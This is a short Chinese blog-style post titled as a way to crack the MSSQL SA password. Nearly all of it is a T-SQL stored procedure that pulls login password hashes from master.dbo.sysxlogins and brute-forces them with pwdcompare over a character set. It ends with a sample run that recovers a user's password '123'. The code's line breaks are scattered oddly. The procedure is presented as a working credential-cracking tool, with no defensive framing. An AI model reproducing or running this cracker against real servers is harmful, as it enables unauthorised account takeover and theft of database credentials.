破解MSSQL的SA密码

admin

alter
proc p_GetPassword2
    @username sysname=null, --用户名,如果不指定,则列出所有用户

@pwdlen
int=2
--要破解的密码的位数,默认是2位及以下的
as
    set nocount on

    if
object_id(N'tempdb..#t') is
not
null
        drop
table #t
    if
object_id(N'tempdb..#pwd') is
not
null
        drop
table #pwd

    set
@pwdlen=case
when
isnull(@pwdlen,0)<1
then
1
else
@pwdlen-1
end

    declare
@ss
varchar(256)
    --select @ss= '123456789'

select
@ss=
'abcdefghijklmnopqrstuvwxyz'
    select
@ss=@ss+
'`0123456789-=[]\;,./'
    select
@ss=@ss+
'~!@#$%^&*()_+{}|:<>?'
    --select @ss=@ss+    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

    create
table #t(c char(1) not
null)
    alter
table #t add
constraint PK_#t primary
key
CLUSTERED (c)
    declare
@index
int
    select
@index=1
    while (@index
<=len(@ss))
    begin
        insert #t select
SUBSTRING(@ss, @index, 1)
        select
@index
=
@index
+1
    end

    select name,password
        ,type=case
when xstatus&2048=2048
then
1
else
0
end
        ,jm=case
when password is
null
then
1
else
0
end
        ,pwdstr=cast(''
as sysname)
        ,pwd=cast(''
as
varchar(8000))
        ,times =cast(''
as
varchar(8000))
        into #pwd
    from master.dbo.sysxlogins a
    where srvid is
null
        and name=isnull(@username,name)
    declare
@s1
varchar(8000),@s2
varchar(8000),@s3
varchar(8000), @stimes
varchar(8000)

    declare
@l
int, @t
bigint

    select
@t
=
count(1)*POWER(len(@ss),1) from #pwd

    select
@l=0
        ,@s1='aa.c'
        ,@s2='cast(ASCII(aa.c) as varchar)'
        ,@s3=',#t aa'
        ,@stimes='1th,'
+
cast(@t
as
varchar(20)) +
'rows'

    exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    while
exists(select
1
from #pwd where jm=0
and
@l<@pwdlen)
    begin
        select
@l=@l+1
        select
@t
=
count(1)*POWER(len(@ss),@l+1) from #pwd
        print
@t

        select
        @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
        ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
        ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
        ,@stimes=@stimes+';'+
cast(@l+1
as
varchar(1)) +
'th,'
+
cast(@t
as
varchar(20)) +
'rows'

        exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        ,times='''+@stimes+'''
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    end
    select 用户名=name,密码=pwdstr,密码ASCII=pwd, 查询次数和行数=times
    from #pwd

    if
object_id(N'tempdb..#t') is
not
null
        drop
table #t
    if
object_id(N'tempdb..#pwd') is
not
null
        drop
table #pwd
我测试如下
p_GetPassword2 'b', 6
用户名        密码        密码ASCII        查询次数和行数
b        123        49,50,51        1th,66rows;2th,4356rows;3th,287496rows